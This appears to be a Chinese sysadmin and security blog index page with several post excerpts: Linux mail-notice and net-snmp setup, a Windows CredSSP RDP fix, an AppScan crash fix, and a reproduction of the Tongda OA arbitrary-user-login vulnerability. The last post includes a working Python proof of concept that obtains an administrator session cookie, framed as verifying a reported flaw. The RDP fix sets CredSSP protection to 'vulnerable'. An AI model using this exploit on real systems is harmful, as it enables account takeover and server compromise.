问题描述:终端远程登陆后经常提示You have new mail in /var/spool/mail/root
这个提示是LINUX会定时查看LINUX各种状态做汇总,每经过一段时间会把汇总的信息发送的root的邮箱里,以供有需之时查看。
一般这种情况mail的内容就只是一些正常的系统信息或者是比较重要的错误报告。如果你安装了mutt的话直接用这个命令就可以查看mail的内容(用root登陆先),没有装的话用cat /var/spool/mail/root查看(用root登陆先)。

解决方案:
第一步:关闭提示

[root@localhost ~]# echo "unset MAILCHECK">> /etc/profile
[root@localhost ~]# source /etc/profile

第二步:查看

[root@localhost ~]# ls -lth /var/spool/mail/

第三步:清空

[root@localhost ~]# cat /dev/null > /var/spool/mail/root

0x00 安装snmp服务

通过yum安装snmp:

[root@localhost ~]# yum -y install net-snmp net-snmp-utils
已加载插件:fastestmirror, langpacks
Loading mirror speeds from cached hostfile
epel/x86_64/metalink                                                                                                                                                                                              | 9.3 kB  00:00:00     
 * base: mirrors.aliyun.com
 * epel: hkg.mirror.rackspace.com
 * extras: mirrors.cn99.com
 * updates: mirrors.aliyun.com
base                                                                                                                                                                                                              | 3.6 kB  00:00:00     
extras                                                                                                                                                                                                            | 2.9 kB  00:00:00     
updates                                                                                                                                                                                                           | 2.9 kB  00:00:00     
正在解决依赖关系
--> 正在检查事务
---> 软件包 net-snmp.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 正在处理依赖关系 net-snmp-agent-libs = 1:5.7.2-48.el7_8.1,它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmptrapd.so.31()(64bit),它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmpmibs.so.31()(64bit),它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
--> 正在处理依赖关系 libnetsnmpagent.so.31()(64bit),它被软件包 1:net-snmp-5.7.2-48.el7_8.1.x86_64 需要
---> 软件包 net-snmp-utils.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 正在检查事务
---> 软件包 net-snmp-agent-libs.x86_64.1.5.7.2-48.el7_8.1 将被 安装
--> 解决依赖关系完成

依赖关系解决

=========================================================================================================================================================================================================================================
 Package                                                        架构                                              版本                                                          源                                                  大小
=========================================================================================================================================================================================================================================
正在安装:
 net-snmp                                                       x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            332 k
 net-snmp-utils                                                 x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            200 k
为依赖而安装:
 net-snmp-agent-libs                                            x86_64                                            1:5.7.2-48.el7_8.1                                            updates                                            707 k

事务概要
=========================================================================================================================================================================================================================================
安装  2 软件包 (+1 依赖软件包)

总下载量:1.2 M
安装大小:3.3 M
Downloading packages:
(1/3): net-snmp-utils-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                                 | 200 kB  00:00:00     
(2/3): net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                            | 707 kB  00:00:00     
(3/3): net-snmp-5.7.2-48.el7_8.1.x86_64.rpm                                                                                                                                                                       | 332 kB  00:00:00     
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
总计                                                                                                                                                                                                     3.4 MB/s | 1.2 MB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  正在安装    : 1:net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                        1/3 
  正在安装    : 1:net-snmp-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                                   2/3 
  正在安装    : 1:net-snmp-utils-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                             3/3 
  验证中      : 1:net-snmp-agent-libs-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                        1/3 
  验证中      : 1:net-snmp-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                                   2/3 
  验证中      : 1:net-snmp-utils-5.7.2-48.el7_8.1.x86_64                                                                                                                                                                             3/3 

已安装:
  net-snmp.x86_64 1:5.7.2-48.el7_8.1                                                                               net-snmp-utils.x86_64 1:5.7.2-48.el7_8.1                                                                              

作为依赖被安装:
  net-snmp-agent-libs.x86_64 1:5.7.2-48.el7_8.1                                                                                                                                                                                          

完毕!

查看snmp版本:

[root@localhost ~]# snmpd -v

NET-SNMP version:  5.7.2
Web:               http://www.net-snmp.org/
Email:             net-snmp-coders@lists.sourceforge.net

启动snmp服务并添加启动项

阅读全文 »

系统版本:Win10专业版 1909
问题描述:在通过mstsc登录某盟的堡垒机的时候出现如下报错:出现身份验证错误/要求的函数不受支持blablabla
NOePqx.jpg
解决方法

  • 运行gpedit.msc进入组策略。
  • 进入计算机配置>管理模板>系统>凭据分配>加密数据库修正。
    NOKntf.jpg
  • 选择启用,更改保护级别为易受攻击后应用。
    NOKlcQ.jpg

应用后再尝试远程桌面即可正常登录了。
PS.若无法找到加密数据库修正,通过找到路径:计算机HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
在System文件夹内创建文件夹项:CredSSPParameters
然后在Parameters文件夹内,新建 DWORD(32)位值(D),名称为 AllowEncryptionOracle,值为2。
NOMeKJ.jpg

由于重装了系统,也重新装各种软件。在安装完appscan10后尚未crack,打开appscan,当载入到“正在装入:GuiLogic”后直接闪退。一开始以为是火绒和360后台杀进程,但是并未看到有任何相关日志。
Nb9mM4.jpg
在虚机里装了同样版本的win10,问题未复现,这就很奇怪了,在52翻到这个帖子:https://www.52pojie.cn/thread-969220-1-1.html,打开计算机-属性,查看本机的计算机名,存在中文字符,再看虚机里面的,并未出现中文字符,更改本地的计算机名appscan就正常打开了。
看来很多国外的软件对中文和特殊字符的支持确实不是那么友好(还有个burpsuite也有各种中文字符问题)。

前言

有单位的系统被通报存在通达OA任意用户登录漏洞,由于系统不在本地在云上,帮忙验证了一下。

一、漏洞简介

未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。
漏洞分析:https://mp.weixin.qq.com/s/yJuLhC1GxkMbGL0mRORIoA

二、漏洞影响

通达OA 2017、
通达OA V11.X--V11.5

三、复现过程

poc的思路

第一步:get http://xxx.com/general/login_code.php拿到uid
第二步:post http://xxx.com/logincheck_code.php通过uid拿到cookie
第三步:get http:/xxx.com/general/index.php?is_modify_pwd=1替换获取的cookie实现任意用户登录

获取cookie的poc:

import requests
import argparse
import random
import warnings
import sys
import re

class Tond_da_poc():
    def __init__(self,url):
        self.url = url+'/'
        self.user_agent =USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
        self.payload_url_uid = '/general/login_code.php'
        self.payload_url_cookie = '/logincheck_code.php'
        self.headers= {'headers':random.choice(self.user_agent)}
        self.vulhub = False



    def get_tongda_uid(self):
        url =self.url+self.payload_url_uid

        r = requests.get(url=url,headers=self.headers,verify=False).text
        print('[*] Checking current URL UID' )
        uid_txt =r.split('code_uid')
        uid_compile = re.compile(r'"({.*})"')
        try:
            get_uid = re.findall(uid_compile,r)
            if len(get_uid) > 0:
                print('【+】 Get current uid successfully',get_uid[0])
                self.vulhub = True
                return get_uid
            else:
                print('[-] Failed to get current UID')

        except Exception as error:
            pass

    def get_tongda_cookies(self):
        url =self.url +self.payload_url_cookie
        data = {'CODEUID':self.get_tongda_uid(),'UID':1}
        r =requests.post(url,data=data,headers =self.headers,verify=False)
        try:
            if r.headers['Set-Cookie'] != None and self.vulhub != False:
               tongda_cookie =r.headers['Set-Cookie']
               print('【+】 Get session of current URL successfully',tongda_cookie)

            else:
                print('[-] Failed to get session of current URL')

        except Exception as error:
            pass







    def run(self):
        self.get_tongda_cookies()



if __name__ == '__main__':


    warnings.simplefilter("ignore")
    if (len(sys.argv)) < 2:
        print('useage : python' +str(sys.argv[0]) + ' -h')
    else:
        parser =argparse.ArgumentParser()
        parser.description ='通达OA < 11.5版本 任意用户登录'
        parser.add_argument('-u',help="待检测url -> example http://127.0.0.1",type=str,dest='check_url')
        args =parser.parse_args()

        aa = Tond_da_poc(args.check_url)
        aa.run()




阅读全文 »